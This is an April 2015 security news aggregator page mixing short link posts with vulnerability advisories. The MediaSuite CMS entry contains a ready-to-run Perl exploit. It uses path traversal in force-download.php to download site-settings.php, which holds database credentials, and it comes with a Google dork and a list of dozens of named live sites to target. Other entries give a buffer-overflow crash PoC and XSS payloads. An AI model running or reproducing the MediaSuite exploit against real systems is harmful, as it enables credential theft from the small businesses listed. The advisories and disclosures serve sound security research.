Passive DNS network mapping

April 21, 2015, 3:17 am

≫ Next: MediaSuite CMS - Artibary File Disclosure Exploit

≪ Previous: SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities

$

0

0

Dnsmap – Passive DNS network mapper a.k.a. subdomains bruteforcer.

dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. During the enumeration stage, the security consultant would typically discover the target company’s IP netblocks, domain names, phone numbers, etc …

Subdomain brute-forcing is another technique that should be used in the enumeration stage, as it’s especially useful when other domain enumeration techniques such as zone transfers don’t work.

more here.......http://securityblog.gr/2523/passive-dns-network-mapping/

---

MediaSuite CMS - Artibary File Disclosure Exploit

April 21, 2015, 3:40 am

≫ Next: DllHijackAuditor 3.5 - Denial Of Service / Crash PoC

≪ Previous: Passive DNS network mapping

$

0

0

 |  |__    /  |  |___  __\   _  \_______   ____
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |      \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/    http://twitter.com/h4SEC
                        /        \ |        \\     \____   Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y
                       /_______  //_______  / \______  /
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] E-Mail : knockout@e-mail.com.tr
[~] Twitter: http://twitter.com/h4SEC
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org
[~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : MediaSuite CMS - Artibary File Disclosure Exploit
|~Price : N/A
|~Version : All CMS
|~Software: http://www.mediasuite.ca
|~Vulnerability Style :  File Disclosure
|~Vulnerability Dir : /
|~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario"
|[~]Date : "20.04.2015"
|[~]Exploit Tested on :  >>>> www.mediasuite.ca ( Official Web ) <<<<<
----------------------------------------------------------
---------------------Info;--------------------------------
----------------------------------------------------------
can be easily found in any database password for this "site-settings.php" will be sufficient to read
possible to read the file on the local database.
incorrect coding and unconscious in it causing ""force-download.php"" file.
that's laughter reason codes:)

##################################################################################################
      file in "force-download.php"
..
..
..
$type = $_GET['type'];
$file = $_GET['file'];

if($type == "1"){
$filename = "../uploads/$file";
}
..
..
..
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();
..
...
#####################################################################################################
------------------Demos---------------------------------------
--------------------------------------------------------------

http://www.jarlette.com
www.mysistersplace.ca
www.donaleighs.com
www.campprospect.com
swimsafe.ca
www.jonesconsulting.com
www.parsonsadl.com
www.gtwsales.ca
www.eventspartyrental.com
www.spalumina.com
drivenmidland.ca
http://innisfilbaseball.com/
http://www.barriedentists.com/
www.ivorynote.ca
www.dockinabox.com
hockeytraininginstitute.com
http://www.simcoesoils.ca
midlandmensbasketball.com
www.alphalocksecurity.com
http://www.thegaragemotorsport.com
http://muskokasoils.ca
sphassociates.ca
https://rocksandgravel.ca
https://thegaragemotorsport.commandcentre.ca
http://www.bradfordsoils.ca
http://www.commercialinsiders.ca
http://www.thepricegroupsupply.com
http://fceconsultants.com
www.meandben.com
www.alkerton.com
http://www.legacylanestables.com
http://conceptofmovement.com
http://www.marshallautomotive.ca
www.loraday.com
..
..
..
       and many more !

##################################################################################################
##############################Exploit.pl#########################################################
##################################################################################################

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] Usaqe : perl $0 Target /path/ \n";
print "[+] Usage  : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* MediaSuite CMS - Artibary File Disclosure Exploit             *\n";
print "\* Exploit coded by : KnocKout                                                  *\n";
print "\* Contact : twitter.com/h4SEC                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Biraz Bekle. \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "site-settings.php");
if ($request->is_success)
{
print "[+] Exploit Basarili, kodlayanin eline saglik \n\n";
print "[+] Exploit Basarili. !\n";
print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. \n";
print "[+] h4 SEC \n";
print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}

# milw00rm.com [2015-04-21] http://www.milw00rm.com/exploits/8079

DllHijackAuditor 3.5 - Denial Of Service / Crash PoC

April 21, 2015, 3:40 am

≫ Next: NASA'S DATA PORTAL

≪ Previous: MediaSuite CMS - Artibary File Disclosure Exploit

$

0

0

# Title : DllHijackAuditor 3.5 - Denial Of Service / Crash PoC
# Author : ZwX
# Date : 21/04/2015
# Download Software : http://securityxploded.com/dllhijackauditor.php
# Vendor : http://securityxploded.com/
# Tested on : Windows 7

------------------------
       Reproduce
------------------------

1. Run DllHijackAuditor
2. Load an .EXE program
3. Run the perl code and copy the characters of the file PoC.txt
4. Paste the characters in input "Specify Extension" and click Start Audit
5. DllHijackAuditor Crashed

------------------------
         PoC
------------------------

#!/bin/perl

my $junk1 = "A" x 500;
open (myfile, '>PoC.txt');
print myfile $junk1;

print "Done";

------------------------
      Crash Log
------------------------

EventType=BEX    <== Buffer Overflow
EventTime=130738615746972233
ReportType=2
Consent=1
UploadTime=130738615752432243
ReportIdentifier=4b47b73e-e607-11e4-b32e-a28695713d6b
IntegratorReportIdentifier=4b47b73d-e607-11e4-b32e-a28695713d6b
Response.BucketId=203778435
Response.BucketTable=19
Response.type=4
Sig[0].Name=Nom de l’application
Sig[0].Value=DllHijackAuditor.exe
Sig[1].Name=Version de l’application
Sig[1].Value=3.5.0.0
Sig[2].Name=Horodatage de l’application
Sig[2].Value=534bb17f
Sig[3].Name=Nom du module par défaut
Sig[3].Value=DllHijackAuditor.exe
Sig[4].Name=Version du module par défaut
Sig[4].Value=3.5.0.0
Sig[5].Name=Horodateur du module par défaut
Sig[5].Value=534bb17f
Sig[6].Name=Décalage de l’exception
Sig[6].Value=00129e6d
Sig[7].Name=Code de l’exception
Sig[7].Value=c0000417
Sig[8].Name=Données d’exception
Sig[8].Value=00000000
LoadedModule[0]=C:\Users\ZwX\Desktop\Dll Hijacking\DllHijackAuditor\DllHijackAuditor.exe
LoadedModule[1]=C:\Windows\SYSTEM32\ntdll.dll
LoadedModule[2]=C:\Windows\system32\kernel32.dll
LoadedModule[3]=C:\Windows\system32\KERNELBASE.dll
LoadedModule[4]=C:\Windows\system32\USER32.dll
LoadedModule[5]=C:\Windows\system32\GDI32.dll
LoadedModule[6]=C:\Windows\system32\LPK.dll
LoadedModule[7]=C:\Windows\system32\USP10.dll
LoadedModule[8]=C:\Windows\system32\msvcrt.dll
LoadedModule[9]=C:\Windows\system32\MSIMG32.dll
LoadedModule[10]=C:\Windows\system32\WINSPOOL.DRV
LoadedModule[11]=C:\Windows\system32\ADVAPI32.dll
LoadedModule[12]=C:\Windows\SYSTEM32\sechost.dll
LoadedModule[13]=C:\Windows\system32\RPCRT4.dll
LoadedModule[14]=C:\Windows\system32\SHELL32.dll
LoadedModule[15]=C:\Windows\system32\SHLWAPI.dll
LoadedModule[16]=C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\COMCTL32.dll
LoadedModule[17]=C:\Windows\system32\UxTheme.dll
LoadedModule[18]=C:\Windows\system32\ole32.dll
LoadedModule[19]=C:\Windows\system32\OLEAUT32.dll
LoadedModule[20]=C:\Windows\system32\VERSION.dll
LoadedModule[21]=C:\Windows\system32\OLEACC.dll
LoadedModule[22]=C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18455_none_72d576ad8665e853\gdiplus.dll
LoadedModule[23]=C:\Windows\system32\IMM32.dll
LoadedModule[24]=C:\Windows\system32\MSCTF.dll
LoadedModule[25]=C:\Windows\system32\WINMM.dll
LoadedModule[26]=C:\Windows\system32\dwmapi.dll
LoadedModule[27]=C:\Windows\system32\CRYPTBASE.dll
LoadedModule[28]=C:\Windows\system32\CLBCatQ.DLL
LoadedModule[29]=C:\Windows\System32\comdlg32.dll
LoadedModule[30]=C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
LoadedModule[31]=C:\Windows\system32\explorerframe.dll
LoadedModule[32]=C:\Windows\system32\DUser.dll
LoadedModule[33]=C:\Windows\system32\DUI70.dll
LoadedModule[34]=C:\Windows\system32\WindowsCodecs.dll
LoadedModule[35]=C:\Windows\system32\apphelp.dll
LoadedModule[36]=C:\Program Files\AVAST Software\Avast\ashShell.dll
LoadedModule[37]=C:\Windows\system32\profapi.dll
LoadedModule[38]=C:\Windows\system32\msi.dll
LoadedModule[39]=C:\Windows\system32\EhStorShell.dll
LoadedModule[40]=C:\Windows\system32\SETUPAPI.dll
LoadedModule[41]=C:\Windows\system32\CFGMGR32.dll
LoadedModule[42]=C:\Windows\system32\DEVOBJ.dll
LoadedModule[43]=C:\Windows\system32\PROPSYS.dll
LoadedModule[44]=C:\Windows\system32\ntshrui.dll
LoadedModule[45]=C:\Windows\system32\srvcli.dll
LoadedModule[46]=C:\Windows\system32\cscapi.dll
LoadedModule[47]=C:\Windows\system32\slc.dll
LoadedModule[48]=C:\Windows\system32\msls31.dll
LoadedModule[49]=C:\Windows\system32\xmllite.dll
LoadedModule[50]=C:\Windows\system32\CRYPTSP.dll
LoadedModule[51]=C:\Windows\system32\rsaenh.dll
LoadedModule[52]=C:\Windows\system32\RpcRtRemote.dll
LoadedModule[53]=C:\Windows\System32\StructuredQuery.dll
LoadedModule[54]=C:\Windows\System32\Secur32.dll
LoadedModule[55]=C:\Windows\system32\SSPICLI.DLL
LoadedModule[56]=C:\Windows\system32\actxprxy.dll
LoadedModule[57]=C:\Program Files\Internet Explorer\ieproxy.dll
LoadedModule[58]=C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
LoadedModule[59]=C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
LoadedModule[60]=C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
LoadedModule[61]=C:\Windows\system32\ntmarta.dll
LoadedModule[62]=C:\Windows\system32\WLDAP32.dll
LoadedModule[63]=C:\Windows\system32\thumbcache.dll
LoadedModule[64]=C:\Windows\system32\PSAPI.DLL
LoadedModule[65]=C:\Windows\system32\SHDOCVW.dll
LoadedModule[66]=C:\Windows\system32\ieframe.DLL
LoadedModule[67]=C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
LoadedModule[68]=C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
LoadedModule[69]=C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
LoadedModule[70]=C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
LoadedModule[71]=C:\Windows\system32\normaliz.DLL
LoadedModule[72]=C:\Windows\system32\iertutil.dll
LoadedModule[73]=C:\Windows\system32\SearchFolder.dll
LoadedModule[74]=C:\Windows\system32\NetworkExplorer.dll
LoadedModule[75]=C:\Windows\system32\MPR.dll
LoadedModule[76]=C:\Windows\System32\drprov.dll
LoadedModule[77]=C:\Windows\System32\WINSTA.dll
LoadedModule[78]=C:\Windows\System32\ntlanman.dll
LoadedModule[79]=C:\Windows\System32\davclnt.dll
LoadedModule[80]=C:\Windows\System32\DAVHLPR.dll
LoadedModule[81]=C:\Windows\system32\wkscli.dll
LoadedModule[82]=C:\Windows\system32\netutils.dll
LoadedModule[83]=C:\Windows\system32\wpdshext.dll
LoadedModule[84]=C:\Windows\system32\PortableDeviceApi.dll
LoadedModule[85]=C:\Windows\system32\WINTRUST.dll
LoadedModule[86]=C:\Windows\system32\CRYPT32.dll
LoadedModule[87]=C:\Windows\system32\MSASN1.dll
LoadedModule[88]=C:\Windows\system32\audiodev.dll
LoadedModule[89]=C:\Windows\system32\WMVCore.DLL
LoadedModule[90]=C:\Windows\system32\WMASF.DLL
LoadedModule[91]=C:\Windows\system32\EhStorAPI.dll
LoadedModule[92]=C:\Windows\system32\LINKINFO.dll
LoadedModule[93]=C:\Windows\system32\samcli.dll
LoadedModule[94]=C:\Windows\system32\SAMLIB.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
State[1].Key=DataRequest
State[1].Value=Bucket=203778435/nBucketTable=19/nResponse=1/n
FriendlyEventName=Fonctionnement arrêté
ConsentKey=BEX  <== Buffer Overflow
AppName=Smart Tool to Audit the Dll Hijack Vulnerability
AppPath=C:\Users\ZwX\Desktop\Dll Hijacking\DllHijackAuditor\DllHijackAuditor.exe

# milw00rm.com [2015-04-21] http://www.milw00rm.com/exploits/8080

NASA'S DATA PORTAL

April 21, 2015, 4:11 am

≫ Next: New Pentest-Report Bazaar / FDroid 01.2015

≪ Previous: DllHijackAuditor 3.5 - Denial Of Service / Crash PoC

$

0

0

A continually growing catalog of publicly available NASA Datasets, APIs, Visualizations,
and more here......https://data.nasa.gov/developer

New Pentest-Report Bazaar / FDroid 01.2015

April 21, 2015, 6:46 am

≫ Next: Vortessence

≪ Previous: NASA'S DATA PORTAL

$

0

0

“Bazaar lets you download apps securely, and share the apps on your phone with
people in close proximity using whatever means are available (WiFi, Bluetooth, NFC,
SDCard, etc). It also audits your installed apps by comparing them to the versions that
other people have installed to make sure they are not malware. We are building upon
the FDroid free software app store for Android to improve the security of the process
while enabling decentralized and peer-to-peer distribution.”
From https :// dev. guardianproject. info/ projects/ bazaar/wiki

This test against several components of the FDroid application and service compound
lasted twelve days and involved efforts from four testers from the Cure53 Team. The test
yielded seventeen security issues and weaknesses total. Among them, two were
classified as ‘Critical’ in regard to their severity. The scope of this project was particularly
broad, since the assignment covered a server-side implementation (composed in
Python), an Android app, and a Wordpress Plugin (written in PHP). In addition, a
majority of services offered on the FDroid website were also examined.

more here........https://cure53.de/pentest-report_fdroid.pdf

Vortessence

April 21, 2015, 6:48 am

≫ Next: CVE-2015-1097: Deobfuscating iOS Kernel Pointers With an IBM X-Force-Discovered Vulnerability

≪ Previous: New Pentest-Report Bazaar / FDroid 01.2015

$

0

0

Vortessence is a tool, whose aim is to partially automate memory forensics analysis. Vortessence is a project of the Security Engineering Lab of the Bern University of Applied Sciences.

more here..........https://github.com/vortessence/vortessence

CVE-2015-1097: Deobfuscating iOS Kernel Pointers With an IBM X-Force-Discovered Vulnerability

April 21, 2015, 6:50 am

≫ Next: Google Analytics by Yoast stored XSS #2 (Inclusive video demo)

≪ Previous: Vortessence

$

0

0

In January, Barak Gabai of the X-Force Application Security Research Team discovered an interesting information leak vulnerability in iOS IOKit IOMobileFramebuffer (CVE-2015-1097), which can be used to defeat the kernel address obfuscation mechanism available since iOS 6. The vulnerability was disclosed to Apple and has been fixed in iOS 8.3.

In this blog post, I will provide a brief overview of the kernel address obfuscation technique employed by iOS and show how Gabai’s vulnerability renders it ineffective, as is the case with similar memory disclosures. I will also briefly touch on what I believe makes this particular vulnerability uniquely interesting.

more here.........http://securityintelligence.com/cve-2015-1097-deobfuscating-ios-kernel-pointers-with-an-ibm-x-force-discovered-vulnerability/#.VTZVXiFViko

Google Analytics by Yoast stored XSS #2 (Inclusive video demo)

April 21, 2015, 7:30 am

≫ Next: PoC: MS15-034 Exploited From Excel

≪ Previous: CVE-2015-1097: Deobfuscating iOS Kernel Pointers With an IBM X-Force-Discovered Vulnerability

$

0

0

Google Analytics by Yoast is a WordPress plug-in for monitoring website traffic. With approximately seven million downloads it’s one of the most popular WordPress plug-ins.

Klikki has identified a second critical security vulnerability in the plug-in. The severity and impact is similar to the first vulnerability. An unauthenticated attacker can store arbitrary HTML, including JavaScript, in the WordPress administrator’s Dashboard on the target system. The JavaScript will be triggered when an administrator views the Analytics panel. No other user interaction is required.

The attacker can perform administrative actions on the target system. By default, this would lead to arbitrary server-side code execution via the plugin or theme editors (see the YouTube example).

Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

The bug was found and reported to the vendor on March 22. An update (version 5.4) correcting the issue was released on April 20.

Details here......http://klikki.fi/adv/yoast_analytics2.html

---

PoC: MS15-034 Exploited From Excel

April 21, 2015, 8:15 am

≫ Next: Contructing the PoC of CVE-2015-3043

≪ Previous: Google Analytics by Yoast stored XSS #2 (Inclusive video demo)

$

0

0

This is a fairly video post from yesterday of MS15-034 exploited from Excel here.....http://videos.didierstevens.com/2015/04/20/poc-ms15-034-exploited-from-excel/

Contructing the PoC of CVE-2015-3043

April 21, 2015, 8:20 am

≫ Next: SSH & Meterpreter Pivoting Techniques

≪ Previous: PoC: MS15-034 Exploited From Excel

$

0

0

360 researchers Analyze and contruct the PoC of CVE-2015-3043 here......http://bobao.360.cn/learning/detail/357.html

This is in Chinese so if you don't speak the language you know what to do

SSH & Meterpreter Pivoting Techniques

April 21, 2015, 10:17 am

≫ Next: Reverse engineering Mischief file format Part 1, 2 and 3

≪ Previous: Contructing the PoC of CVE-2015-3043

$

0

0

WTF is Pivoting?

Pivoting is a technique used to route traffic through a compromised host on a penetration test.

When conducting an external penetration test you may need to route traffic through a compromised machine in order to compromise internal targets.

Pivoting, allows you to leverage tools on your attacking machine while routing traffic through other hosts on the subnet, and potentially allowing access to other subnets

more here.........https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/

Reverse engineering Mischief file format Part 1, 2 and 3

April 21, 2015, 10:25 am

≫ Next: HOW TO CRACK MIFARE CLASSIC CARDS

≪ Previous: SSH & Meterpreter Pivoting Techniques

$

0

0

Here is a great drawing program called Mischief...https://www.madewithmischief.com/

It is beautiful, minimalistic, vector-based and very responsive. What's there not to like?

I wanted to read their file format, but it turned out to be harder than expected.
So I decided to write about the reverse-engineering process.

Part 1 here.......http://m1el.github.io/mischief/part-1.html



In part 2, we're going to look at the unpacking function in Mischief here....http://m1el.github.io/mischief/part-2.html


and in part 3 we're going to parse unpacked .art data here.....http://m1el.github.io/mischief/part-3.html

HOW TO CRACK MIFARE CLASSIC CARDS

April 21, 2015, 1:04 pm

≫ Next: Texas aims to limit controversial "stingray" phone-tracking tech

≪ Previous: Reverse engineering Mischief file format Part 1, 2 and 3

$

0

0

In this blog post I will cover some quick basics about NFC, Mifare Classic and how to set up everything for reading and writing a NFC tag. At the end I show you how to reprogram a vending machine’s NFC tag to contain more credits.

more here.........https://www.firefart.at/how-to-crack-mifare-classic-cards/

Texas aims to limit controversial "stingray" phone-tracking tech

April 21, 2015, 2:15 pm

≫ Next: Reflected XSS Vulnerability In Manage Engine Firewall Analyzer

≪ Previous: HOW TO CRACK MIFARE CLASSIC CARDS

$

0

0

Because it's considered a matter of "national security," many won't talk about the controversial phone-tracking technology. Texas doesn't care about that and wants due process to come first.

more here.....http://www.zdnet.com/article/texas-bill-aims-to-limit-controversial-stingray-phone-tracking-tech/

Reflected XSS Vulnerability In Manage Engine Firewall Analyzer

April 21, 2015, 3:11 pm

≫ Next: Reflected XSS Vulnerability In Manage Engine Event Log Analyzer

≪ Previous: Texas aims to limit controversial "stingray" phone-tracking tech

$

0

0

========================================================================
=======Reflected XSS Vulnerability In Manage Engine Firewall Analyzer
========================================================================
=======

. contents:: Table Of Content

Overview
========

* Title : Reflected XSS Vulnerability in XSS In Manage Engine Firewall Analyzer
* Author: Kapil Kulkarni
* Plugin Homepage: https://www.manageengine.com/products/firewall/?gclid=CKH3rLyNiMUCFUQnjgodwHIA1A&gclsrc=aw.ds
* Severity: Low
* Version Affected: Version 8.3 Build Number:8300
* version patched: Separate Patch release for all version

Description 
===========

About the Product
=================
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network 
administrators to centrally collect, archive, analyze their security device logs and generate forensic reports out of 
it.
Real-time event response system and Integrated Compliance Management module of Firewall Analyzer automates your end 
point security monitoring, network bandwidth monitoring and security & compliance auditing. Firewall Analyzer eases 
your Device Configuration Management by providing out-of-the-box reports and alerts for configuration changes. Firewall 
Analyzer is vendor-agnostic and supports almost all open source and commercial network firewalls like Check Point, 
Cisco, Juniper, Fortinet, Snort, Squid Project, SonicWALL, Palo Alto and more, IDS/IPS, VPNs, Proxies and other related 
security devices


Vulnerable Parameter 
--------------------

* j_username

About Vulnerability
-------------------
This Product is vulnerable to a combination of XSS attack meaning that if an admin user can be tricked to visit a 
crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into 
login page. Once exploited, admin?s browser can be made to do almost anything the admin user could typically do by 
hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XS
S)

Steps to Reproduce: (POC)
=========================
1. After Setting up Manage engine navigate to its user interface

2. Use this payload in Username field

#####payload To Use#######################
"><script>alert(document.cookie)</script>
##########################################

3. And see the XSS in action.

#Live Poc URL
http://2.bp.blogspot.com/-tR6Sj42AU3U/VTah88edXnI/AAAAAAAABMo/N8DjRQorso4/s1600/poc_xss.JPG
http://kapil-hackertutorials.blogspot.in/

Mitigation 
==========
Follow the below steps to fix the issue:
Please find the fix for XSS vulnerabilities:

1. Stop the FWA service.

2. Download the fix and extract it:

This would contain 7 fix folders and 1 additional folder:

•       FWA Home - conf    (1 file)
•       FWA Home - lib   (8 files)
•       FWA Home - lib - resources   (2 files)
•       FWA Home - webapps - fw - images    (1 file)
•       FWA Home - webapps - fw - javascript    (2 files)
•       FWA Home - webapps - fw - styles     (1 file)
•       FWA Home - webapps - fw - WEB-INF    (2 files)
and

•       Screen-shot folder
// The last additional folder containing screen-shots for your reference explaining "what files have to be placed / 
replaced?" and "Where?" //

3. Now place or replace the files as per the screen-shots from the above 7 folders to their respective locations as 
instructed below:


Location        Files which has to be newly placed      Files which has to be replaced 
(A similar would be there in this 
location , just replace it)
C:\ManageEngine\Firewall\conf   
antisamy-fwa-policy.xml -
C:\ManageEngine\Firewall\lib    
antisamy-1.5.3
batik-css.jar
nekohtml.jar
ss_css2.jar
xercesImpl.jar
xml-apis.jar    FirewallAnalyzerJSP.jar
LogAnalyzerClient.jar
C:\ManageEngine\Firewall\lib\resources  -       
MessageResources.prop
MessageResources_JS_en_US.prop
C:\ManageEngine\Firewall\webapps\fw\images      
errorpage.png   -
C:\ManageEngine\Firewall\webapps\fw\javascript  -       
FAUtil.js
PolicyReport.js
C:\ManageEngine\Firewall\webapps\fw\styles      -       
newTheme.css
C:\ManageEngine\Firewall\webapps\fw\WEB-INF     -       
struts-config.xml
web.xml

 // C:\ManageEngine\Firewall is referred as <FWA Home> i.e. Default FWA installation folder //

4. Start the FWA service.

This should fix the vulnerability issues. 
Change Log
==========

Disclosure 
==========
23-March-2015 Reported to Developer
28-February-2015 Acknowledgement from Developer
04-April-2015 Fixed by developer
05-April-2015 Requested a CVE ID 
22-April-2015 Public Disclosed 
credits
=======
* Kapil Kulkarni 
* Information Security Testing
* ControlCase International Pvt Ltd. 
* https://www.facebook.com/kapil.kulkarni.587
*https://in.linkedin.com/pub/kapil-kulkarni-c-eh/63/337/5a3

---

Reflected XSS Vulnerability In Manage Engine Event Log Analyzer

April 21, 2015, 3:12 pm

≫ Next: The CozyDuke APT

≪ Previous: Reflected XSS Vulnerability In Manage Engine Firewall Analyzer

$

0

0

=======
Reflected XSS Vulnerability In Manage Engine Event Log Analyzer
========================================================================
=======

. contents:: Table Of Content

Overview
========

* Title : Reflected XSS Vulnerability in XSS In Manage Engine Event Log Analyzer
* Author: Kapil Kulkarni
* Plugin Homepage: https://www.manageengine.com/products/eventlog/
* Severity: Low
* Version Affected: Version 10 Build Number:10003
* version patched: Separate Patch release for all version

Description 
===========

About the Product
=================
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM)software on the 
market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of 
machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central 
location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor 
privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and 
instantly generating a variety of reports like user activity reports, historical trend reports, and more.

Vulnerable Parameter 
--------------------

* j_username

About Vulnerability
-------------------
This Product is vulnerable to a combination of XSS attack meaning that if an admin user can be tricked to visit a 
crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into 
login page. Once exploited, admin?s browser can be made to do almost anything the admin user could typically do by 
hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XS
S)

Steps to Reproduce: (POC)
=========================
1. After Setting up Manage engine navigate to its user interface

2. Use this payload in Username field

#####payload To Use#######################
"><script>alert(document.cookie)</script>
##########################################

3. And see the XSS in action.

#Live Poc URL
http://1.bp.blogspot.com/-ujCdc0Ryknc/VTadwPT9bZI/AAAAAAAABMc/MuSU3XKtKsY/s1600/xss_reponse.JPG

Mitigation 
==========
Follow the below steps to fix the issue:
1. Stop the ELA Service.
2. Download the file from the following link and extract it in C:\ManageEngine\EventLog\lib\.
             C:\ManageEngine\EventLog is where you have it installed.
http://bonitas2.zohocorp.com/zipUploads/2015_01_04_03_07_14_o_19hos70vafslcd31ts716gm1gvq1.tar.gz
3. Once you extracted the folder structure has to be as below.
                C:\ManageEngine\EventLog\lib\EventLogAnalyzerJSP\com\adventnet\sa....
4. Start the EventLog Analyzer service.
This should fix the issue.
P.S : Extract the zip and put the folder inside the location. Do not take the entire zip file to the location as it 
will not work.

Change Log
==========

Disclosure 
==========
23-March-2015 Reported to Developer
28-February-2015 Acknowledgement from Developer
04-April-2015 Fixed by developer
06-April-2015 Requested a CVE ID 
22-April-2015 Public Disclosed 
credits
=======
* Kapil Kulkarni 
* Information Security Testing
* ControlCase International Pvt Ltd. 
* https://www.facebook.com/kapil.kulkarni.587
*https://in.linkedin.com/pub/kapil-kulkarni-c-eh/63/337/5a3

The CozyDuke APT

April 21, 2015, 3:14 pm

≫ Next: Threatbutt

≪ Previous: Reflected XSS Vulnerability In Manage Engine Event Log Analyzer

$

0

0

CozyDuke (aka CozyBear, CozyCar or "Office Monkeys") is a threat actor that became increasingly active in the 2nd half of 2014 and hit a variety of targets. The White House and Department of State are two of the most spectacular known victims.

The operation presents several interesting aspects

blatantly sensitive high profile victims and targets
crypto and anti-detection capabilities
strong malware functional and structural similarities mating this toolset to early MiniDuke second stage components, along with more recent CosmicDuke and OnionDuke components

more here..........https://securelist.com/blog/69731/the-cozyduke-apt/

Threatbutt

April 21, 2015, 3:26 pm

≫ Next: Stored Cross Site Scripting Vulnerability in Add Link to Facebook WordPress Plugin

≪ Previous: The CozyDuke APT

$

0

0

I thought I heard it all. What a name! A new site known as http://threatbutt.com/ at RSA announced its comprehensice private, hybrid, public and cumulus cloud system  hacking protector that in private beta. 

Stored Cross Site Scripting Vulnerability in Add Link to Facebook WordPress Plugin

April 21, 2015, 3:29 pm

≫ Next: Patrol

≪ Previous: Threatbutt

$

0

0

Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin

Author: Rohit Kumar

Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/

Severity: Medium

Version Affected: Version 1.215 and mostly prior to it.

Version Tested: Version 1.215

Version Patched : 1.215

Description:

Vulnerable Parameter
1. App ID
2. App Secret
3. Custom Picture URL
4. Default Picture URL
5. URL News Feed Icon

About Vulnerability
This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user
accessed to “Add Link to Facebook” Settings in Wordpress with Administrator privileges. A malicious
administrator can hijack other user’s sessions, take control of another administrator’s browser or install
malware on their computer.

Vulnerability Class:
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce:
After installing the plugin:
 Goto Settings All in One Facebook
&#61623; Input this payload in “App ID” :- “><script>alert(1)</script>
&#61623; Click on the Save button.
&#61623; After reloading the page you will see a Pop Up Box with 1 written on it.
&#61623; Reload the page again to make sure it’s stored.

Change Log
https://wordpress.org/plugins/add-link-to-facebook/changelog/

Disclosure
09th March 2015

Patrol

April 21, 2015, 5:26 pm

≫ Next: icy-kernel

≪ Previous: Stored Cross Site Scripting Vulnerability in Add Link to Facebook WordPress Plugin

$

0

0

A platform for testing an Android device's applications for IPC-related vulnerabilities here.......https://github.com/ehrenb/Patrol